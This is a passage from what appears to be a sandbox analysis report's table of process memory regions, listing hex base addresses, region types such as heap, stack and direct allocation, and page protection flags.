stack
|
page read and write
|
||
18E000
|
stack
|
page read and write
|
||
3416000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
3412000
|
heap
|
page read and write
|
||
4796000
|
heap
|
page read and write
|
||
F50000
|
trusted library allocation
|
page read and write
|
||
3AE000
|
stack
|
page read and write
|
||
3DCE000
|
stack
|
page read and write
|
||
501000
|
heap
|
page read and write
|
||
530000
|
heap
|
page read and write
|
||
23EF000
|
stack
|
page read and write
|
||
5552000
|
heap
|
page read and write
|
||
5089000
|
heap
|
page read and write
|
||
45C000
|
system
|
page execute and read and write
|
||
1AF9C000
|
stack
|
page read and write
|
||
4828000
|
heap
|
page read and write
|
||
3E8E000
|
heap
|
page read and write
|
||
7BF000
|
heap
|
page read and write
|
||
22370000
|
heap
|
page read and write
|
||
EF0000
|
trusted library allocation
|
page read and write
|
||
7FE8B130000
|
trusted library allocation
|
page read and write
|
||
9FED000
|
direct allocation
|
page execute and read and write
|
||
20000
|
heap
|
page read and write
|
||
21F3D000
|
stack
|
page read and write
|
||
7FE897E0000
|
trusted library allocation
|
page read and write
|
||
502E000
|
stack
|
page read and write
|
||
4856000
|
heap
|
page read and write
|
||
559000
|
heap
|
page read and write
|
||
1C35A000
|
stack
|
page read and write
|
||
A048000
|
direct allocation
|
page execute and read and write
|
||
57F1000
|
heap
|
page read and write
|
||
2168000
|
heap
|
page read and write
|
||
6B4000
|
heap
|
page read and write
|
||
640000
|
heap
|
page read and write
|
||
1C57C000
|
heap
|
page read and write
|
||
8488000
|
direct allocation
|
page execute and read and write
|
||
3DC3000
|
heap
|
page read and write
|
||
18C000
|
stack
|
page read and write
|
||
3E59000
|
heap
|
page read and write
|
||
56BD000
|
heap
|
page read and write
|
||
35D5000
|
trusted library allocation
|
page read and write
|
||
1BE8000
|
heap
|
page read and write
|
||
18C000
|
stack
|
page read and write
|
||
217A000
|
heap
|
page read and write
|
||
25F0000
|
trusted library allocation
|
page read and write
|
||
3280000
|
trusted library allocation
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
10000
|
heap
|
page read and write
|
||
A064000
|
direct allocation
|
page execute and read and write
|
||
183000
|
stack
|
page read and write
|
||
6141000
|
heap
|
page read and write
|
||
9FD6000
|
direct allocation
|
page execute and read and write
|
||
A079000
|
direct allocation
|
page execute and read and write
|
||
575000
|
heap
|
page read and write
|
||
51CE000
|
stack
|
page read and write | page guard
|
||
7FE897A0000
|
trusted library allocation
|
page execute and read and write
|
||
1C6EC000
|
stack
|
page read and write
|
||
21D6000
|
heap
|
page read and write
|
||
1C53C000
|
heap
|
page read and write
|
||
56C4000
|
heap
|
page read and write
|
||
392000
|
heap
|
page read and write
|
||
7FE89850000
|
trusted library allocation
|
page read and write
|
||
43D000
|
trusted library allocation
|
page execute and read and write
|
||
47E3000
|
heap
|
page read and write
|
||
528F000
|
stack
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
18C000
|
stack
|
page read and write
|
||
2530000
|
trusted library allocation
|
page read and write
|
||
3F0000
|
heap
|
page read and write
|
||
46AC000
|
heap
|
page read and write
|
||
598000
|
heap
|
page read and write
|
||
3FB000
|
heap
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
564F000
|
heap
|
page read and write
|
||
1DF4000
|
heap
|
page read and write
|
||
58C1000
|
heap
|
page read and write
|
||
97E000
|
stack
|
page read and write
|
||
60EE000
|
heap
|
page read and write
|
||
45A000
|
heap
|
page read and write
|
||
920000
|
trusted library allocation
|
page read and write
|
||
18E000
|
stack
|
page read and write
|
||
1E9000
|
heap
|
page read and write
|
||
6188000
|
heap
|
page read and write
|
||
473000
|
system
|
page execute and read and write
|
||
585C000
|
heap
|
page read and write
|
||
2750000
|
heap
|
page execute and read and write
|
||
3F0000
|
heap
|
page read and write
|
||
51E000
|
heap
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
1F1F000
|
stack
|
page read and write
|
||
3417000
|
heap
|
page read and write
|
||
5C2A000
|
heap
|
page read and write
|
||
2400000
|
trusted library allocation
|
page read and write
|
||
5B2000
|
heap
|
page read and write
|
||
43E000
|
heap
|
page read and write
|
||
300000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
373000
|
heap
|
page read and write
|
||
671000
|
heap
|
page read and write
|
||
48FA000
|
heap
|
page read and write
|
||
2534000
|
heap
|
page read and write
|
||
28E0000
|
remote allocation
|
page read and write
|
||
7FFFFF10000
|
trusted library allocation
|
page execute and read and write
|
||
300000
|
heap
|
page read and write
|
||
3281000
|
trusted library allocation
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
474000
|
heap
|
page read and write
|
||
2207E000
|
stack
|
page read and write
|
||
270E000
|
stack
|
page read and write | page guard
|
||
290000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
A110000
|
direct allocation
|
page execute and read and write
|
||
56CE000
|
heap
|
page read and write
|
||
270000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
56BD000
|
heap
|
page read and write
|
||
6078000
|
remote allocation
|
page execute and read and write
|
||
4741000
|
heap
|
page read and write
|
||
253F000
|
stack
|
page read and write
|
||
1C4B000
|
heap
|
page read and write
|
||
6DD000
|
heap
|
page read and write
|
||
60CB000
|
heap
|
page read and write
|
||
9FFF000
|
direct allocation
|
page execute and read and write
|
||
56CC000
|
heap
|
page read and write
|
||
2492000
|
trusted library allocation
|
page read and write
|
||
3B40000
|
trusted library allocation
|
page read and write
|
||
3B5000
|
heap
|
page read and write
|
||
5AE0000
|
heap
|
page read and write
|
||
5FC000
|
heap
|
page read and write
|
||
3DC4000
|
heap
|
page read and write
|
||
3F7000
|
heap
|
page read and write
|
||
3E8E000
|
heap
|
page read and write
|
||
350000
|
heap
|
page read and write
|
||
1E90000
|
heap
|
page execute and read and write
|
||
8C000
|
stack
|
page read and write
|
||
45D000
|
system
|
page execute and read and write
|
||
3AC000
|
heap
|
page read and write
|
||
160000
|
trusted library allocation
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
341E000
|
heap
|
page read and write
|
||
56A1000
|
heap
|
page read and write
|
||
15D000
|
trusted library allocation
|
page execute and read and write
|
||
5869000
|
heap
|
page read and write
|
||
46F000
|
unkown
|
page readonly
|
||
7FE899A0000
|
trusted library allocation
|
page read and write
|
||
455000
|
heap
|
page read and write
|
||
3CE0000
|
trusted library allocation
|
page read and write
|
||
3B6000
|
heap
|
page read and write
|
||
1B05E000
|
stack
|
page read and write
|
||
62C000
|
heap
|
page read and write
|
||
21E4D000
|
stack
|
page read and write
|
||
3DC0000
|
heap
|
page read and write
|
||
920000
|
heap
|
page execute and read and write
|
||
A11C000
|
direct allocation
|
page execute and read and write
|
||
2E7000
|
stack
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
46FD000
|
heap
|
page read and write
|
||
4A65000
|
heap
|
page read and write
|
||
2226000
|
heap
|
page read and write
|
||
2680000
|
heap
|
page read and write
|
||
7FE8B1E0000
|
trusted library allocation
|
page read and write
|
||
D79000
|
trusted library allocation
|
page read and write
|
||
7FE898C5000
|
trusted library allocation
|
page read and write
|
||
A0B1000
|
direct allocation
|
page execute and read and write
|
||
4B60000
|
trusted library allocation
|
page execute and read and write
|
||
2FFF000
|
trusted library allocation
|
page read and write
|
||
2927000
|
trusted library allocation
|
page read and write
|
||
3419000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
3DA6000
|
heap
|
page read and write
|
||
91E000
|
stack
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
408000
|
unkown
|
page readonly
|
||
8D000
|
stack
|
page read and write
|
||
2D39000
|
trusted library allocation
|
page read and write
|
||
557B000
|
heap
|
page read and write
|
||
4C0000
|
heap
|
page read and write
|
||
2620000
|
trusted library allocation
|
page read and write
|
||
56CC000
|
heap
|
page read and write
|
||
411B000
|
stack
|
page read and write
|
||
225BF000
|
stack
|
page read and write
|
||
1C5C000
|
heap
|
page read and write
|
||
4A1000
|
heap
|
page read and write
|
||
27F0000
|
trusted library allocation
|
page read and write
|
||
5656000
|
heap
|
page read and write
|
||
52F000
|
stack
|
page read and write
|
||
4DE000
|
heap
|
page read and write
|
||
7FE89810000
|
trusted library allocation
|
page read and write
|
||
7FE89950000
|
trusted library allocation
|
page read and write
|
||
2470000
|
trusted library allocation
|
page read and write
|
||
569D000
|
heap
|
page read and write
|
||
280000
|
heap
|
page read and write
|
||
555000
|
heap
|
page read and write
|
||
3A20000
|
heap
|
page read and write
|
||
922000
|
heap
|
page read and write
|
||
579000
|
heap
|
page read and write
|
||
E60000
|
trusted library allocation
|
page read and write
|
||
DBE000
|
stack
|
page read and write
|
||
5B27000
|
heap
|
page read and write
|
||
63DF000
|
heap
|
page read and write
|
||
3E3C000
|
heap
|
page read and write
|
||
3287000
|
trusted library allocation
|
page read and write
|
||
1250F000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
1A981000
|
heap
|
page read and write
|
||
1A738000
|
stack
|
page read and write
|
||
309000
|
trusted library allocation
|
page read and write
|
||
1AC78000
|
heap
|
page read and write
|
||
A0B4000
|
direct allocation
|
page execute and read and write
|
||
1DC0000
|
heap
|
page read and write
|
||
340B000
|
stack
|
page read and write
|
||
6049000
|
heap
|
page read and write
|
||
7FFFFF83000
|
trusted library allocation
|
page execute read
|
||
328A000
|
trusted library allocation
|
page read and write
|
||
17F000
|
stack
|
page read and write
|
||
74E000
|
heap
|
page read and write
|
||
7FE896F0000
|
trusted library allocation
|
page execute and read and write
|
||
355000
|
heap
|
page read and write
|
||
5578000
|
heap
|
page read and write
|
||
3E8E000
|
heap
|
page read and write
|
||
A03E000
|
direct allocation
|
page execute and read and write
|
||
53F000
|
heap
|
page read and write
|
||
6A81000
|
heap
|
page read and write
|
||
1CA9F000
|
stack
|
page read and write
|
||
3371000
|
heap
|
page read and write
|
||
3412000
|
heap
|
page read and write
|
||
45C000
|
system
|
page execute and read and write
|
||
408000
|
unkown
|
page readonly
|
||
53C000
|
heap
|
page read and write
|
||
A099000
|
direct allocation
|
page execute and read and write
|
||
7FFFFF87000
|
trusted library allocation
|
page execute read
|
||
3E73000
|
heap
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
4EC0000
|
heap
|
page read and write
|
||
257E000
|
stack
|
page read and write
|
||
36D000
|
heap
|
page read and write
|
||
2D31000
|
trusted library allocation
|
page read and write
|
||
5D20000
|
heap
|
page read and write
|
||
52E2000
|
heap
|
page read and write
|
||
2470000
|
trusted library allocation
|
page read and write
|
||
17F000
|
stack
|
page read and write
|
||
314000
|
heap
|
page read and write
|
||
4741000
|
heap
|
page read and write
|
||
3BD000
|
heap
|
page read and write
|
||
43E0000
|
trusted library allocation
|
page read and write
|
||
277000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
400000
|
unkown
|
page readonly
|
||
60CF000
|
stack
|
page read and write
|
||
2DE000
|
stack
|
page read and write
|
||
3180000
|
trusted library allocation
|
page read and write
|
||
EC000
|
stack
|
page read and write
|
||
3941000
|
trusted library allocation
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
550000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
3C2000
|
heap
|
page read and write
|
||
2F88000
|
trusted library allocation
|
page read and write
|
||
668000
|
heap
|
page read and write
|
||
450000
|
direct allocation
|
page read and write
|
||
35C0000
|
trusted library allocation
|
page read and write
|
||
170000
|
trusted library allocation
|
page read and write
|
||
341E000
|
heap
|
page read and write
|
||
4837000
|
heap
|
page read and write
|
||
E00000
|
direct allocation
|
page read and write
|
||
2D36000
|
trusted library allocation
|
page read and write
|
||
330000
|
heap
|
page read and write
|
||
6A55000
|
heap
|
page read and write
|
||
220FE000
|
stack
|
page read and write
|
||
46A6000
|
heap
|
page read and write
|
||
50B000
|
heap
|
page read and write
|
||
6E0000
|
heap
|
page read and write
|
||
7FE89770000
|
trusted library allocation
|
page read and write
|
||
47E3000
|
heap
|
page read and write
|
||
A046000
|
direct allocation
|
page execute and read and write
|
||
21D8000
|
heap
|
page read and write
|
||
7FE8AECC000
|
trusted library allocation
|
page execute and read and write
|
||
2500000
|
trusted library allocation
|
page read and write
|
||
3A8000
|
heap
|
page read and write
|
||
5B56000
|
heap
|
page read and write
|
||
4E1D000
|
stack
|
page read and write
|
||
5869000
|
heap
|
page read and write
|
||
290000
|
direct allocation
|
page read and write
|
||
463000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
2630000
|
trusted library allocation
|
page read and write
|
||
7FE89840000
|
trusted library allocation
|
page read and write
|
||
7FE8B18C000
|
trusted library allocation
|
page read and write
|
||
52C4000
|
heap
|
page read and write
|
||
2840000
|
trusted library allocation
|
page read and write
|
||
485C000
|
stack
|
page read and write
|
||
5FDF000
|
heap
|
page read and write
|
||
2CB5000
|
heap
|
page read and write
|
||
228B000
|
heap
|
page read and write
|
||
46B9000
|
heap
|
page read and write
|
||
3F0000
|
trusted library section
|
page read and write
|
||
550000
|
heap
|
page read and write
|
||
8BE000
|
stack
|
page read and write | page guard
|
||
3B5000
|
heap
|
page read and write
|
||
26FF000
|
stack
|
page read and write
|
||
235F000
|
stack
|
page read and write
|
||
4A39000
|
heap
|
page read and write
|
||
610000
|
heap
|
page read and write
|
||
7FFFFF89000
|
trusted library allocation
|
page execute read
|
||
546E000
|
stack
|
page read and write
|
||
579000
|
heap
|
page read and write
|
||
5686000
|
heap
|
page read and write
|
||
26A2000
|
trusted library allocation
|
page read and write
|
||
3264000
|
trusted library allocation
|
page read and write
|
||
56C0000
|
heap
|
page read and write
|
||
3C7000
|
heap
|
page read and write
|
||
6E9000
|
heap
|
page read and write
|
||
48A0000
|
heap
|
page read and write
|
||
2501000
|
trusted library allocation
|
page read and write
|
||
890000
|
heap
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
53E000
|
heap
|
page read and write
|
||
38B0000
|
trusted library allocation
|
page read and write
|
||
3417000
|
heap
|
page read and write
|
||
1D7F000
|
stack
|
page read and write
|
||
968000
|
heap
|
page read and write
|
||
A05C000
|
direct allocation
|
page execute and read and write
|
||
1CFE000
|
heap
|
page execute and read and write
|
||
320000
|
heap
|
page read and write
|
||
4A6A000
|
heap
|
page read and write
|
||
3DE000
|
heap
|
page read and write
|
||
DCD000
|
stack
|
page read and write
|
||
45C000
|
system
|
page execute and read and write
|
||
401000
|
unkown
|
page execute read
|
||
2BA5000
|
trusted library allocation
|
page read and write
|
||
4861000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
671000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
397000
|
direct allocation
|
page read and write
|
||
FC0000
|
trusted library allocation
|
page execute and read and write
|
||
20F3000
|
heap
|
page read and write
|
||
674000
|
heap
|
page read and write
|
||
66C000
|
heap
|
page read and write
|
||
7FE89690000
|
trusted library allocation
|
page execute and read and write
|
||
6F3000
|
heap
|
page read and write
|
||
1242F000
|
trusted library allocation
|
page read and write
|
||
33F5000
|
heap
|
page read and write
|
||
1CF0000
|
direct allocation
|
page read and write
|
||
49F0000
|
trusted library allocation
|
page read and write
|
||
250000
|
direct allocation
|
page read and write
|
||
26F000
|
stack
|
page read and write
|
||
574000
|
heap
|
page read and write
|
||
573000
|
heap
|
page read and write
|
||
3E8E000
|
heap
|
page read and write
|
||
327E000
|
trusted library allocation
|
page read and write
|
||
33BC000
|
heap
|
page read and write
|
||
50D3000
|
heap
|
page read and write
|
||
2513000
|
trusted library allocation
|
page read and write
|
||
1E0000
|
heap
|
page read and write
|
||
DED000
|
heap
|
page read and write
|
||
260000
|
trusted library allocation
|
page read and write
|
||
56B0000
|
heap
|
page read and write
|
||
3459000
|
trusted library allocation
|
page read and write
|
||
56C1000
|
heap
|
page read and write
|
||
245F000
|
stack
|
page read and write
|
||
46F000
|
unkown
|
page readonly
|
||
3D0000
|
direct allocation
|
page read and write
|
||
3E75000
|
heap
|
page read and write
|
||
430000
|
direct allocation
|
page read and write
|
||
1C025000
|
heap
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
5869000
|
heap
|
page read and write
|
||
6D8000
|
heap
|
page read and write
|
||
46AC000
|
heap
|
page read and write
|
||
340A000
|
heap
|
page read and write
|
||
53F000
|
heap
|
page read and write
|
||
3DBF000
|
heap
|
page read and write
|
||
2840000
|
trusted library allocation
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
5578000
|
heap
|
page read and write
|
||
9FEF000
|
direct allocation
|
page execute and read and write
|
||
224BF000
|
stack
|
page read and write
|
||
56BA000
|
heap
|
page read and write
|
||
1AFA0000
|
heap
|
page read and write
|
||
5B75000
|
stack
|
page read and write
|
||
4AF000
|
stack
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
3BD000
|
heap
|
page read and write
|
||
A18000
|
heap
|
page read and write
|
||
21E0000
|
heap
|
page read and write
|
||
327A000
|
trusted library allocation
|
page read and write
|
||
3D0000
|
heap
|
page read and write
|
||
7FE8AE7D000
|
trusted library allocation
|
page execute and read and write
|
||
3410000
|
trusted library allocation
|
page execute
|
||
50F000
|
heap
|
page read and write
|
||
63F000
|
stack
|
page read and write
|
||
379000
|
heap
|
page read and write
|
||
170000
|
trusted library allocation
|
page read and write
|
||
341E000
|
heap
|
page read and write
|
||
7FE89820000
|
trusted library allocation
|
page read and write
|
||
2D6000
|
heap
|
page read and write
|
||
615000
|
heap
|
page read and write
|
||
154000
|
trusted library allocation
|
page read and write
|
||
823E000
|
stack
|
page read and write
|
||
7FE89970000
|
trusted library allocation
|
page read and write
|
||
1E2C000
|
heap
|
page read and write
|
||
2319000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
3417000
|
heap
|
page read and write
|
||
58BF000
|
heap
|
page read and write
|
||
316000
|
heap
|
page read and write
|
||
4861000
|
heap
|
page read and write
|
||
440000
|
heap
|
page read and write
|
||
1E10000
|
heap
|
page read and write
|
||
33BC000
|
heap
|
page read and write
|
||
600000
|
heap
|
page read and write
|
||
3AC000
|
heap
|
page read and write
|
||
130000
|
trusted library section
|
page read and write
|
||
56B7000
|
heap
|
page read and write
|
||
1C61000
|
heap
|
page read and write
|
||
4AF000
|
stack
|
page read and write
|
||
46F000
|
unkown
|
page readonly
|
||
7FE8B078000
|
trusted library allocation
|
page read and write
|
||
56BD000
|
heap
|
page read and write
|
||
6A0000
|
heap
|
page read and write
|
||
5830000
|
heap
|
page read and write
|
||
375000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
295000
|
stack
|
page read and write
|
||
ECF000
|
trusted library allocation
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
61B7000
|
heap
|
page read and write
|
||
603000
|
heap
|
page read and write
|
||
6AF000
|
heap
|
page read and write
|
||
1C553000
|
heap
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
360000
|
heap
|
page read and write
|
||
3CCA000
|
stack
|
page read and write
|
||
1B170000
|
heap
|
page read and write
|
||
509B000
|
heap
|
page read and write
|
||
373000
|
heap
|
page read and write
|
||
5557000
|
heap
|
page read and write
|
||
3E62000
|
heap
|
page read and write
|
||
54F000
|
heap
|
page read and write
|
||
4D0000
|
heap
|
page read and write
|
||
3E8E000
|
heap
|
page read and write
|
||
183000
|
stack
|
page read and write
|
||
3459000
|
trusted library allocation
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
2227000
|
heap
|
page read and write
|
||
4C0000
|
heap
|
page read and write
|
||
585E000
|
heap
|
page read and write
|
||
563000
|
heap
|
page read and write
|
||
362000
|
heap
|
page read and write
|
||
3C70000
|
trusted library allocation
|
page read and write
|
||
160000
|
heap
|
page read and write
|
||
58C1000
|
heap
|
page read and write
|
||
9FFB000
|
direct allocation
|
page execute and read and write
|
||
347000
|
heap
|
page read and write
|
||
49D000
|
heap
|
page read and write
|
||
4858000
|
heap
|
page read and write
|
||
2A05000
|
trusted library allocation
|
page read and write
|
||
250000
|
heap
|
page read and write
|
||
4A30000
|
heap
|
page read and write
|
||
19D000
|
trusted library allocation
|
page execute and read and write
|
||
557000
|
heap
|
page read and write
|
||
12421000
|
trusted library allocation
|
page read and write
|
||
9FF9000
|
direct allocation
|
page execute and read and write
|
||
690000
|
heap
|
page read and write
|
||
3905000
|
trusted library allocation
|
page read and write
|
||
A075000
|
direct allocation
|
page execute and read and write
|
||
600E000
|
heap
|
page read and write
|
||
7FE8AF30000
|
trusted library allocation
|
page execute and read and write
|
||
56AD000
|
heap
|
page read and write
|
||
7FE8994A000
|
trusted library allocation
|
page read and write
|
||
319000
|
heap
|
page read and write
|
||
1ADED000
|
stack
|
page read and write
|
||
4854000
|
heap
|
page read and write
|
||
45C000
|
system
|
page execute and read and write
|
||
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
46F000
|
unkown
|
page readonly
|
||
6B8000
|
heap
|
page read and write
|
||
2E8000
|
stack
|
page read and write
|
||
2F58000
|
trusted library allocation
|
page read and write
|
||
1E49000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
B20000
|
heap
|
page read and write
|
||
3AC000
|
heap
|
page read and write
|
||
25FF000
|
stack
|
page read and write
|
||
375000
|
heap
|
page read and write
|
||
561A000
|
heap
|
page read and write
|
||
2D35000
|
trusted library allocation
|
page read and write
|
||
51B3000
|
heap
|
page read and write
|
||
45A000
|
heap
|
page read and write
|
||
1C99F000
|
stack
|
page read and write
|
||
45C000
|
system
|
page execute and read and write
|
||
7FE8AE74000
|
trusted library allocation
|
page read and write
|
||
21E3000
|
heap
|
page read and write
|
||
48F9000
|
heap
|
page read and write
|
||
D73000
|
trusted library allocation
|
page read and write
|
||
35C1000
|
trusted library allocation
|
page read and write
|
||
1C7DC000
|
stack
|
page read and write
|
||
3B0000
|
heap
|
page read and write
|
||
597000
|
heap
|
page read and write
|
||
3487000
|
trusted library allocation
|
page read and write
|
||
6229000
|
heap
|
page read and write
|
||
39B4000
|
trusted library allocation
|
page read and write
|
||
E40000
|
direct allocation
|
page read and write
|
||
DF0000
|
direct allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
3CD0000
|
trusted library allocation
|
page read and write
|
||
3A1000
|
heap
|
page read and write
|
||
4E5000
|
heap
|
page read and write
|
||
51D1000
|
heap
|
page read and write
|
||
4810000
|
trusted library allocation
|
page execute and read and write
|
||
925000
|
trusted library allocation
|
page execute and read and write
|
||
5B0000
|
heap
|
page read and write
|
||
930000
|
trusted library allocation
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
46F000
|
unkown
|
page readonly
|
||
8C000
|
stack
|
page read and write
|
||
3680000
|
trusted library allocation
|
page read and write
|
||
4A66000
|
heap
|
page read and write
|
||
21EE000
|
heap
|
page read and write
|
||
46B2000
|
heap
|
page read and write
|
||
1C300000
|
heap
|
page read and write
|
||
2510000
|
trusted library allocation
|
page read and write
|
||
395000
|
heap
|
page read and write
|
||
31D0000
|
trusted library allocation
|
page read and write
|
||
5859000
|
heap
|
page read and write
|
||
3E8E000
|
heap
|
page read and write
|
||
340000
|
heap
|
page read and write
|
||
2300000
|
trusted library allocation
|
page read and write
|
||
6D8000
|
heap
|
page read and write
|
||
2123000
|
heap
|
page read and write
|
||
3E7E000
|
heap
|
page read and write
|
||
490000
|
heap
|
page read and write
|
||
1C8F000
|
heap
|
page read and write
|
||
1C2C0000
|
heap
|
page read and write
|
||
456000
|
system
|
page execute and read and write
|
||
4C8000
|
heap
|
page read and write
|
||
1EB0000
|
heap
|
page read and write
|
||
2CD000
|
stack
|
page read and write
|
||
8A0000
|
direct allocation
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
18C000
|
stack
|
page read and write
|
||
56B5000
|
heap
|
page read and write
|
||
450000
|
heap
|
page read and write
|
||
5BB4000
|
heap
|
page read and write
|
||
393000
|
heap
|
page read and write
|
||
A066000
|
direct allocation
|
page execute and read and write
|
||
46B9000
|
heap
|
page read and write
|
||
12462000
|
trusted library allocation
|
page read and write
|
||
5FF000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page read and write
|
||
67B000
|
heap
|
page read and write
|
||
5CB8000
|
heap
|
page read and write
|
||
2E0000
|
heap
|
page execute and read and write
|
||
10000
|
heap
|
page read and write
|
||
36D000
|
heap
|
page read and write
|
||
2400000
|
trusted library allocation
|
page read and write
|
||
1A6D0000
|
heap
|
page execute and read and write
|
||
3BB0000
|
trusted library allocation
|
page read and write
|
||
520000
|
heap
|
page read and write
|
||
510000
|
heap
|
page read and write
|
||
4B6000
|
heap
|
page read and write
|
||
30D000
|
heap
|
page read and write
|
||
340A000
|
heap
|
page read and write
|
||
A03C000
|
direct allocation
|
page execute and read and write
|
||
1C58C000
|
stack
|
page read and write
|
||
A0C5000
|
direct allocation
|
page execute and read and write
|
||
495F000
|
stack
|
page read and write
|
||
7FFFFF10000
|
trusted library allocation
|
page execute and read and write
|
||
5C89000
|
heap
|
page read and write
|
||
48F9000
|
heap
|
page read and write
|
||
EA0000
|
direct allocation
|
page read and write
|
||
585A000
|
heap
|
page read and write
|
||
2D0000
|
trusted library allocation
|
page read and write
|
||
5BA8000
|
heap
|
page read and write
|
||
6AF000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
7FFFFF87000
|
trusted library allocation
|
page execute read
|
||
212C000
|
heap
|
page read and write
|
||
16C000
|
stack
|
page read and write
|
||
DD0000
|
direct allocation
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
571E000
|
stack
|
page read and write
|
||
469A000
|
heap
|
page read and write
|
||
579000
|
heap
|
page read and write
|
||
5B91000
|
heap
|
page read and write
|
||
28B0000
|
trusted library allocation
|
page read and write
|
||
18C000
|
stack
|
page read and write
|
||
7FE8B027000
|
trusted library allocation
|
page read and write
|
||
1C5C000
|
heap
|
page read and write
|
||
4AE8000
|
heap
|
page read and write
|
||
240000
|
trusted library allocation
|
page read and write
|
||
45A000
|
heap
|
page read and write
|
||
7FE8B074000
|
trusted library allocation
|
page read and write
|
||
56C0000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
1CC000
|
stack
|
page read and write
|
||
27F000
|
stack
|
page read and write
|
||
451F000
|
stack
|
page read and write
|
||
3D90000
|
heap
|
page read and write
|
||
47E9000
|
heap
|
page read and write
|
||
61A000
|
heap
|
page read and write
|
||
46F000
|
unkown
|
page readonly
|
||
1DE4000
|
heap
|
page read and write
|
||
2700000
|
trusted library allocation
|
page read and write
|
||
46C9000
|
heap
|
page read and write
|
||
33DB000
|
heap
|
page read and write
|
||
7FFFFF89000
|
trusted library allocation
|
page execute read
|
||
23B0000
|
heap
|
page read and write
|
||
2C08000
|
trusted library allocation
|
page read and write
|
||
48FB000
|
heap
|
page read and write
|
||
3282000
|
trusted library allocation
|
page read and write
|
||
2D42000
|
trusted library allocation
|
page read and write
|
||
1C5A4000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
1AA30000
|
heap
|
page read and write
|
||
2700000
|
heap
|
page read and write
|
||
42C000
|
unkown
|
page read and write
|
||
568B000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
1C40000
|
heap
|
page read and write
|
||
2CA0000
|
remote allocation
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
473000
|
system
|
page execute and read and write
|
||
1B0DE000
|
stack
|
page read and write
|
||
5859000
|
heap
|
page read and write
|
||
62C000
|
heap
|
page read and write
|
||
5B85000
|
heap
|
page read and write
|
||
433000
|
trusted library allocation
|
page execute and read and write
|
||
6B7000
|
heap
|
page read and write
|
||
25AD000
|
stack
|
page read and write
|
||
6215000
|
heap
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
7FE89800000
|
trusted library allocation
|
page read and write
|
||
220F000
|
stack
|
page read and write
|
||
518D000
|
heap
|
page read and write
|
||
28B0000
|
trusted library allocation
|
page read and write
|
||
1C61000
|
heap
|
page read and write
|
||
5BB0000
|
trusted library allocation
|
page read and write
|
||
3C9A000
|
trusted library allocation
|
page read and write
|
||
2247F000
|
stack
|
page read and write
|
||
21CD0000
|
trusted library allocation
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
2AD000
|
heap
|
page read and write
|
||
1E49000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
400000
|
unkown
|
page readonly
|
||
1E57000
|
direct allocation
|
page read and write
|
||
43E0000
|
trusted library allocation
|
page read and write
|
||
CA0000
|
trusted library allocation
|
page read and write
|
||
452F000
|
stack
|
page read and write
|
||
4A60000
|
heap
|
page read and write
|
||
634D000
|
stack
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
280000
|
direct allocation
|
page read and write
|
||
5576000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
5BFB000
|
heap
|
page read and write
|
||
5869000
|
heap
|
page read and write
|
||
3CD5000
|
trusted library allocation
|
page read and write
|
||
41B000
|
system
|
page execute and read and write
|
||
1C4D4000
|
heap
|
page read and write
|
||
F60000
|
trusted library allocation
|
page read and write
|
||
360000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
223000
|
stack
|
page read and write
|
||
5096000
|
heap
|
page read and write
|
||
2D42000
|
trusted library allocation
|
page read and write
|
||
3371000
|
heap
|
page read and write
|
||
56D2000
|
heap
|
page read and write
|
||
393000
|
direct allocation
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
42C000
|
unkown
|
page read and write
|
||
6180000
|
heap
|
page read and write
|
||
1AC1F000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
379000
|
heap
|
page read and write
|
||
1C2DC000
|
